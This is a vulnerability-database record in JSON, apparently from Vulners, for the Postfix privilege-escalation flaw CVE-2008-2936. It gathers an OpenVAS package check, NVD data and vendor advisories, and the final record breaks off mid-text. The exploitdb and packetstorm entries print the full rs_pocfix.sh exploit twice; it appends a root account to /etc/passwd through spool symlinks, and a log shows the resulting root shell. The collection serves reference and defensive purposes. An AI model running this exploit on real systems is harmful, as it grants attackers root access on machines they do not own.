{"id": "OPENVAS:1361412562310880023", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for postfix CESA-2008:0839 centos3 x86_64", "description": "Check for the Version of postfix", "published": "2009-02-27T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880023", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["2008:0839", "http://lists.centos.org/pipermail/centos-announce/2008-August/015186.html"], "cvelist": ["CVE-2008-2936"], "lastseen": "2018-04-09T11:40:23", "viewCount": 1, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-04-09T11:40:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-2936", "CVE-2008-0839"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9222", "SECURITYVULNS:DOC:20429"]}, {"type": "ubuntu", "idList": ["USN-636-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:69542"]}, {"type": "exploitdb", "idList": ["EDB-ID:6337"]}, {"type": "redhat", "idList": ["RHSA-2008:0839"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0839"]}, {"type": "centos", "idList": ["CESA-2008:0839"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1629-2:3AB83", "DEBIAN:DSA-1629-1:960C3"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2DEE05799E2429D8CD17202F417BE030"]}, {"type": "seebug", "idList": ["SSV:65680", "SSV:17321"]}, {"type": "cert", "idList": ["VU:938323"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2008-0839.NASL", "DEBIAN_DSA-1629.NASL", "MANDRIVA_MDVSA-2008-171.NASL", "ORACLELINUX_ELSA-2008-0839.NASL", "CENTOS_RHSA-2008-0839.NASL", "SUSE_POSTFIX-5501.NASL", "UBUNTU_USN-636-1.NASL", "SUSE9_12219.NASL", "SUSE_11_0_POSTFIX-080804.NASL", "SL_20080814_POSTFIX_ON_SL3_X.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:870021", "OPENVAS:61434", "OPENVAS:880268", "OPENVAS:1361412562310870021", "OPENVAS:61435", "OPENVAS:1361412562310880268", "OPENVAS:840190", "OPENVAS:1361412562310830713", "OPENVAS:880023", "OPENVAS:830713"]}, {"type": "gentoo", "idList": ["GLSA-200808-12"]}, {"type": "suse", "idList": ["SUSE-SA:2008:040"]}, {"type": "fedora", "idList": ["FEDORA:71804208749", "FEDORA:5F8CF208974"]}], "modified": "2018-04-09T11:40:23", "rev": 2}, "vulnersScore": 7.3}, "pluginID": "1361412562310880023", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postfix CESA-2008:0839 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\n and TLS.\n\n A flaw was found in the way Postfix dereferences symbolic links. If a local\n user has write access to a mail spool directory with no root mailbox, it\n may be possible for them to append arbitrary data to files that root has\n write permission to. (CVE-2008-2936)\n \n Red Hat would like to thank Sebastian Krahmer for responsibly disclosing\n this issue.\n \n All users of postfix should upgrade to these updated packages, which\n contain a backported patch that resolves this issue.\";\n\ntag_affected = \"postfix on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-August/015186.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880023\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0839\");\n script_cve_id(\"CVE-2008-2936\");\n script_name( \"CentOS Update for postfix CESA-2008:0839 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of postfix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"postfix\", rpm:\"postfix~2.0.16~14.1.RHEL3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}

{"cve": [{"lastseen": "2021-02-02T05:35:14", "description": "Postfix before 2.3.15, 2.4 before 2.4.8, 2.5 before 2.5.4, and 2.6 before 2.6-20080814, when the operating system supports hard links to symlinks, allows local users to append e-mail messages to a file to which a root-owned symlink points, by creating a hard link to this symlink and then sending a message. NOTE: this can be leveraged to gain privileges if there is a symlink to an init script.\nPlease refer to the following links for additional version information (vendor release notes):\r\n\r\n\r\nPostfix 2.3 - ftp://mirrors.loonybin.net/pub/postfix/official/postfix-2.3.15.RELEASE_NOTES\r\n\r\nPostfix 2.4 - ftp://mirrors.loonybin.net/pub/postfix/official/postfix-2.4.8.RELEASE_NOTES\r\n\r\nPostfix 2.5 - ftp://mirrors.loonybin.net/pub/postfix/official/postfix-2.5.4.RELEASE_NOTES\r\n\r\nPostfix 2.6 - ftp://mirrors.loonybin.net/pub/postfix/experimental/postfix-2.6-20080814.RELEASE_NOTES", "edition": 4, "cvss3": {}, "published": "2008-08-18T19:41:00", "title": "CVE-2008-2936", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2936"], "modified": "2018-10-11T20:45:00", "cpe": ["cpe:/a:postfix:postfix:2.3.13", "cpe:/a:postfix:postfix:2.3.8", "cpe:/a:postfix:postfix:2.3.1", "cpe:/a:postfix:postfix:2.3.9", "cpe:/a:postfix:postfix:2.4.7", "cpe:/a:postfix:postfix:2.3.5", "cpe:/a:postfix:postfix:2.4.6", "cpe:/a:postfix:postfix:2.3.7", "cpe:/a:postfix:postfix:2.5.1", "cpe:/a:postfix:postfix:2.5.2", "cpe:/a:postfix:postfix:2.5.0", "cpe:/a:postfix:postfix:2.3.0", "cpe:/a:postfix:postfix:2.4.4", "cpe:/a:postfix:postfix:2.3.2", "cpe:/a:postfix:postfix:2.5.3", "cpe:/a:postfix:postfix:2.4.3", "cpe:/a:postfix:postfix:2.3.10", "cpe:/a:postfix:postfix:2.3.14", "cpe:/a:postfix:postfix:2.3.3", "cpe:/a:postfix:postfix:2.3.4", "cpe:/a:postfix:postfix:2.3.11", "cpe:/a:postfix:postfix:2.4.0", "cpe:/a:postfix:postfix:2.3.12", "cpe:/a:postfix:postfix:2.4.5", "cpe:/a:postfix:postfix:2.3.6", "cpe:/a:postfix:postfix:2.6.0", "cpe:/a:postfix:postfix:2.4.1", "cpe:/a:postfix:postfix:2.4.2"], "id": "CVE-2008-2936", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2936", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:postfix:postfix:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:postfix:postfix:2.3.2:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-2936"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHello,\r\n\r\nThe recent vulnerability in Postfix discovered by Sebastian Krahmer is\r\ntrivially exploitable when certain preconditions are met. Nevertheless,\r\nit&#39;s very difficult to find such conditions in a real-world scenario. I\r\nwrote this exploit for fun and to demonstrate that. I also hope it helps\r\nsysadmins to check and test their systems.\r\n\r\nI used an Ubuntu/Debian &#40;IA32&#41; system which *I had to make vulnerable on\r\npurpose*. The tweaks were:\r\n- - #1: make the spool writable to attacker\r\nchmod o+w /var/mail\r\n- - #2: disable mail aliases &#40;LDA should be able to deliver mail directly to\r\n&quot;root&quot; mailbox&#41;\r\n- - #3: use &quot;local&quot; postfix process as LDA\r\n\r\nPerhaps condition #1 is the most difficult to meet, for a normal\r\n&#40;non-privileged&#41; user. But think about a privilege escalation if you manage\r\nto get into the &quot;mail&quot; group first &#40;spool dir is tipically writable by\r\nmembers of &quot;mail&quot; group&#41;.\r\n\r\nFor #2, it depends on configuration, but Ubuntu/Debian usually creates an\r\nalias for &quot;root&quot;, so that mail is delivered to a non-root account &#40;and\r\nmaking the system non vulnerable to this exploit&#41;.\r\n\r\nWhen installing Postfix, you are asked to choose a local delivery agent\r\n&#40;LDA&#41;. I found one of my test systems using procmail &#40;not vulnerable&#41; and\r\nanother one using postfix built-in LDA &#40;vulnerable&#41;.\r\n\r\nFor a quick test, normally, it will be sufficient to append the following\r\nlines to /etc/postfix/main.cf:\r\nalias_maps =\r\nmailbox_command =\r\n&#40;left blank intentionally&#41;\r\n\r\nFinally, postfix should be refreshed:\r\npostfix reload\r\n\r\nThere are other preconditions like:\r\n- - #4: postfix should not be using maildir-style mailboxes\r\n- - #5: mailbox for &quot;root&quot; should not exist &#40;or at least you should have\r\npermission to delete it, which is not always possible, even when #1 is true&#41;\r\n\r\nMy script tries to do its best to check for these conditions &#40;postfix\r\nconfig is very flexible, I only checked some typical parameters&#41;. Feel free\r\nto write me for corrections, etc.\r\n\r\n==============\r\n\r\nroman@jupiter:~$ wget http://www.rs-labs.com/exploitsntools/rs_pocfix.sh\r\nroman@jupiter:~$ chmod a+x rs_pocfix.sh\r\nroman@jupiter:~$ ./rs_pocfix.sh\r\n#\r\n# &quot;rs_pocfix.sh&quot; &#40;PoC for Postfix local root vulnerability: CVE-2008-2936&#41;\r\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt &lt;roman@rs-labs.com&gt;\r\n#\r\n# Tested: Ubuntu / Debian\r\n#\r\n# [ Madrid, 30.Aug.2008 ]\r\n#\r\n[*] Postfix seems to be installed\r\n[*] Hardlink to symlink not dereferenced\r\n[*] Spool dir is writable\r\n[*] Backed up: /etc/passwd &#40;saved as &quot;/tmp/pocfix_target_backup.18107&quot;&#41;\r\n[*] Sending mail &#40;3 seconds wait&#41;\r\n[*] Exploit successful &#40;appended data to /etc/passwd&#41;. Now &quot;su dsr&quot;, pass\r\nis &quot;dsrrocks&quot;&#41;\r\nroman@jupiter:~$ su dsr\r\nPassword:\r\nsh-3.1#\r\n\r\n==============\r\n\r\nPS: I didn&#39;t find Wietse&#39;s nice advisory [1] on postfix.org site &#40;or at\r\nleast, if it exists, it&#39;s not easy to find it&#41;. Although it seems that some\r\nnon-POSIX issues in OS are contributing to the vulnerability, IMHO it&#39;s a\r\n&#40;low-medium risk&#41; vulnerability in Postfix and it deserves to be listed on\r\npostfix page. Despite this issue, Postfix continues being one of the best\r\nmail server software ever made and my favourite MTA.\r\n\r\n[1] http://article.gmane.org/gmane.mail.postfix.announce/110\r\n\r\n- --\r\n\r\nCheers,\r\n- -Roman\r\n\r\nPGP Fingerprint:\r\n09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742\r\n[Key ID: 0xEAD56742. Available at KeyServ]\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 &#40;MingW32&#41;\r\n\r\niD8DBQFIunoI5H+KferVZ0IRAkBrAKCwgHV+6O+At5Hw0dsYs8kYJZQjZACeJ96a\r\nWw7gCuqOt32rA2HhiTuKeRk=\r\n=oo87\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-09-02T00:00:00", "published": "2008-09-02T00:00:00", "id": "SECURITYVULNS:DOC:20429", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20429", "title": "PoCfix &#40;PoC for Postfix local root vuln - CVE-2008-2936&#41;", "type": "securityvulns", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-2937", "CVE-2008-2936"], "description": "It&#39;s possible to cause Postfix to deliver mail to system file by using hardlinks to symlink &#40;available against standard in Linux, IRIX, Solaris&#41;.", "edition": 1, "modified": "2008-09-02T00:00:00", "published": "2008-09-02T00:00:00", "id": "SECURITYVULNS:VULN:9222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9222", "title": "Postfix mail server hardlinks privilege escalation", "type": "securityvulns", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:22:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "Sebastian Krahmer discovered that Postfix was not correctly handling \nmailbox ownership when dealing with Linux's implementation of hardlinking \nto symlinks. In certain mail spool configurations, a local attacker \ncould exploit this to append data to arbitrary files as the root user. \nThe default Ubuntu configuration was not vulnerable.", "edition": 5, "modified": "2008-08-19T00:00:00", "published": "2008-08-19T00:00:00", "id": "USN-636-1", "href": "https://ubuntu.com/security/notices/USN-636-1", "title": "Postfix vulnerability", "type": "ubuntu", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:54", "description": "", "published": "2008-08-31T00:00:00", "type": "packetstorm", "title": "rs_pocfix.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "id": "PACKETSTORM:69542", "href": "https://packetstormsecurity.com/files/69542/rs_pocfix.txt.html", "sourceData": "`#!/bin/sh \n# \n# \"rs_pocfix.sh\" (PoC for Postfix local root vulnerability: CVE-2008-2936) \n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com> \n# \n# Tested: Ubuntu / Debian \n# \n# [ Madrid, 30.Aug.2008 ] \n# \n \n# Config \n \nwritable_dir=/tmp \nspool_dir=/var/mail # Use \"postconf mail_spool_directory\" to obtain this \nuser=root \ntarget=/etc/passwd \nuseful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at \nuseful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less \nseconds=3 \nuser_in_passwd=\"dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh\" # Pass is \"dsrrocks\" \npostfix=`which postfix` # /usr/sbin/postfix \npostconf=/usr/sbin/postconf \npostmap=/usr/sbin/postmap \n \n \n# Funcs \n \nquit() \n{ \necho \"$1\" \nexit \n} \n \n \n# Step 1: is my system vulnerable? \n \nhead -n 9 $0 | tail -n 8 \nif [ $postfix ] ; then \necho \"[*] Postfix seems to be installed\" \nelse \nquit \"[!] Are you sure Postfix is installed?\" \nfi \n \nmkdir -p $writable_dir/pocfix \ntouch $writable_dir/pocfix/src \nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1 \nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2 \n \nif [ -L $writable_dir/pocfix/dst2 ] ; then \necho \"[*] Hardlink to symlink not dereferenced\" \nrm -rf $writable_dir/pocfix \nelse \nrm -rf $writable_dir/pocfix \nquit \"[!] Hardlink to symlink correctly dereferenced. System is not vulnerable\" \nfi \n \nif [ -d $spool_dir -a -w $spool_dir ] ; then \necho \"[*] Spool dir is writable\" \nelse \nquit \"[!] Spool dir is not writable\" \nfi \n \nif [ -e $spool_dir/$user ] ; then \nrm -f $spool_dir/$user \necho \"[*] Mailbox for \\\"$user\\\" found. Trying to delete it\" \n \nif [ -e $spool_dir/$user ] ; then \nquit \"[!] Couldn't delete it\" \nelse \necho \"[*] Deletion ok\" \nfi \n \nfi \n \nif [ -e $spool_dir/$useful_link_dst ] ; then \nrm -f $spool_dir/$useful_link_dst \necho \"[*] Mailbox for \\\"$useful_link_dst\\\" found. Trying to delete it\" \n \nif [ -e $spool_dir/$useful_link_dst ] ; then \nquit \"[!] Couldn't delete it\" \nelse \necho \"[*] Deletion ok\" \nfi \n \nfi \n \naliases=`$postconf alias_database | cut -d\"=\" -f2` \n$postconf alias_maps | grep -q $aliases \nif [ $? -eq 0 ] ; then \nif [ $aliases ] ; then \n$postmap -q $user $aliases > /dev/null \nif [ $? -eq 0 ] ; then \nquit \"[!] Mail alias for \\\"$user\\\" exists\" \nfi \nfi \nfi \n \nlda=`$postconf mailbox_command | cut -d\"=\" -f2` \nif [ $lda ] ; then \nquit \"[!] Non-Postfix LDA detected\" \nfi \n \n$postconf home_mailbox | grep -q '/$' \nif [ $? -eq 0 ] ; then \nquit \"[!] Maildir-style mailbox detected\" \nfi \n \n \n# Step 2: Exploiting \n \nln -f $useful_link $spool_dir/$user 2> /dev/null || quit \"[!] Couldn't create hardlink (different partitions?)\" \nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit \"[!] Couldn't create symlink pointing to target file\" \ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo \"[*] Backed up: $target (saved as \\\"$writable_dir/pocfix_target_backup.$$\\\")\" \necho \"[*] Sending mail ($seconds seconds wait)\" \necho $user_in_passwd | /usr/sbin/sendmail $user \n \nsleep $seconds \n \ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null \n \nif [ $? -eq 0 ] ; then \necho \"[!] Exploit failed\" \nelse \necho \"[*] Exploit successful (appended data to $target). Now \\\"su dsr\\\", pass is \\\"dsrrocks\\\")\" \nfi \n \nrm -f $spool_dir/$user \nrm -f $spool_dir/$useful_link_dst \n \n`\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/69542/rs_pocfix.txt"}], "exploitdb": [{"lastseen": "2016-02-01T00:40:12", "description": "Postfix. CVE-2008-2936. Local exploit for linux platform", "published": "2008-08-31T00:00:00", "type": "exploitdb", "title": "Postfix <= 2.6-20080814 - symlink Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2936"], "modified": "2008-08-31T00:00:00", "id": "EDB-ID:6337", "href": "https://www.exploit-db.com/exploits/6337/", "sourceData": "#!/bin/sh\r\n#\r\n# \"rs_pocfix.sh\" (PoC for Postfix local root vulnerability: CVE-2008-2936)\r\n# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>\r\n#\r\n# Tested: Ubuntu / Debian\r\n#\r\n# [ Madrid, 30.Aug.2008 ]\r\n#\r\n\r\n# Config\r\n\r\nwritable_dir=/tmp\r\nspool_dir=/var/mail\t\t# Use \"postconf mail_spool_directory\" to obtain this\r\nuser=root\r\ntarget=/etc/passwd\r\nuseful_link=/usr/bin/atq\t# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at\r\nuseful_link_dst=at\t\t# Tip: find / -type l -uid 0 -print -exec ls -l {} \\; | less\r\nseconds=3\r\nuser_in_passwd=\"dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh\" # Pass is \"dsrrocks\"\r\npostfix=`which postfix`\t\t# /usr/sbin/postfix\r\npostconf=/usr/sbin/postconf\r\npostmap=/usr/sbin/postmap\r\n\r\n\r\n# Funcs\r\n\r\nquit()\r\n{\r\n echo \"$1\"\r\n exit\r\n}\r\n\r\n\r\n# Step 1: is my system vulnerable?\r\n\r\nhead -n 9 $0 | tail -n 8\r\nif [ $postfix ] ; then\r\n echo \"[*] Postfix seems to be installed\"\r\nelse\r\n quit \"[!] Are you sure Postfix is installed?\"\r\nfi\r\n\r\nmkdir -p $writable_dir/pocfix\r\ntouch $writable_dir/pocfix/src\r\nln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1\r\nln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2\r\n\r\nif [ -L $writable_dir/pocfix/dst2 ] ; then\r\n echo \"[*] Hardlink to symlink not dereferenced\"\r\n rm -rf $writable_dir/pocfix\r\nelse\r\n rm -rf $writable_dir/pocfix\r\n quit \"[!] Hardlink to symlink correctly dereferenced. System is not vulnerable\"\r\nfi\r\n\r\nif [ -d $spool_dir -a -w $spool_dir ] ; then\r\n echo \"[*] Spool dir is writable\"\r\nelse\r\n quit \"[!] Spool dir is not writable\"\r\nfi\r\n\r\nif [ -e $spool_dir/$user ] ; then\r\n rm -f $spool_dir/$user\r\n echo \"[*] Mailbox for \\\"$user\\\" found. Trying to delete it\"\r\n\r\n if [ -e $spool_dir/$user ] ; then\r\n quit \"[!] Couldn't delete it\"\r\n else\r\n echo \"[*] Deletion ok\"\r\n fi\r\n\r\nfi\r\n\r\nif [ -e $spool_dir/$useful_link_dst ] ; then\r\n rm -f $spool_dir/$useful_link_dst\r\n echo \"[*] Mailbox for \\\"$useful_link_dst\\\" found. Trying to delete it\"\r\n\r\n if [ -e $spool_dir/$useful_link_dst ] ; then\r\n quit \"[!] Couldn't delete it\"\r\n else\r\n echo \"[*] Deletion ok\"\r\n fi\r\n\r\nfi\r\n\r\naliases=`$postconf alias_database | cut -d\"=\" -f2`\r\n$postconf alias_maps | grep -q $aliases\r\nif [ $? -eq 0 ] ; then\r\n if [ $aliases ] ; then\r\n $postmap -q $user $aliases > /dev/null\r\n if [ $? -eq 0 ] ; then\r\n quit \"[!] Mail alias for \\\"$user\\\" exists\"\r\n fi\r\n fi\r\nfi\r\n\r\nlda=`$postconf mailbox_command | cut -d\"=\" -f2`\r\nif [ $lda ] ; then\r\n quit \"[!] Non-Postfix LDA detected\"\r\nfi \r\n\r\n$postconf home_mailbox | grep -q '/$'\r\nif [ $? -eq 0 ] ; then\r\n quit \"[!] Maildir-style mailbox detected\"\r\nfi\r\n\r\n\r\n# Step 2: Exploiting\r\n\r\nln -f $useful_link $spool_dir/$user 2> /dev/null || quit \"[!] Couldn't create hardlink (different partitions?)\"\r\nln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit \"[!] Couldn't create symlink pointing to target file\"\r\ncp -f $target $writable_dir/pocfix_target_backup.$$ && echo \"[*] Backed up: $target (saved as \\\"$writable_dir/pocfix_target_backup.$$\\\")\"\r\necho \"[*] Sending mail ($seconds seconds wait)\"\r\necho $user_in_passwd | /usr/sbin/sendmail $user\r\n\r\nsleep $seconds\r\n\r\ndiff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null\r\n\r\nif [ $? -eq 0 ] ; then\r\n echo \"[!] Exploit failed\"\r\nelse\r\n echo \"[*] Exploit successful (appended data to $target). Now \\\"su dsr\\\", pass is \\\"dsrrocks\\\")\"\r\nfi\r\n\r\nrm -f $spool_dir/$user\r\nrm -f $spool_dir/$useful_link_dst\r\n\r\n# milw0rm.com [2008-08-31]\r\n", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6337/"}], "redhat": [{"lastseen": "2019-08-13T18:46:30", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "Postfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\nand TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a local\nuser has write access to a mail spool directory with no root mailbox, it\nmay be possible for them to append arbitrary data to files that root has\nwrite permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly disclosing\nthis issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.", "modified": "2017-09-08T12:11:11", "published": "2008-08-14T04:00:00", "id": "RHSA-2008:0839", "href": "https://access.redhat.com/errata/RHSA-2008:0839", "type": "redhat", "title": "(RHSA-2008:0839) Moderate: postfix security update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:46", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "[2.3.3-2.1]\n- fixed postfix privilege problem with symlinks in the mail spool directory\n (CVE-2008-2936)\n Resolves: rhbz#456717", "edition": 4, "modified": "2008-08-14T00:00:00", "published": "2008-08-14T00:00:00", "id": "ELSA-2008-0839", "href": "http://linux.oracle.com/errata/ELSA-2008-0839.html", "title": "postfix security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:24:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2936"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0839\n\n\nPostfix is a Mail Transport Agent (MTA), supporting LDAP, SMTP AUTH (SASL),\nand TLS.\n\nA flaw was found in the way Postfix dereferences symbolic links. If a local\nuser has write access to a mail spool directory with no root mailbox, it\nmay be possible for them to append arbitrary data to files that root has\nwrite permission to. (CVE-2008-2936)\n\nRed Hat would like to thank Sebastian Krahmer for responsibly disclosing\nthis issue.\n\nAll users of postfix should upgrade to these updated packages, which\ncontain a backported patch that resolves this issue.\n\n**Merged security bulletin from 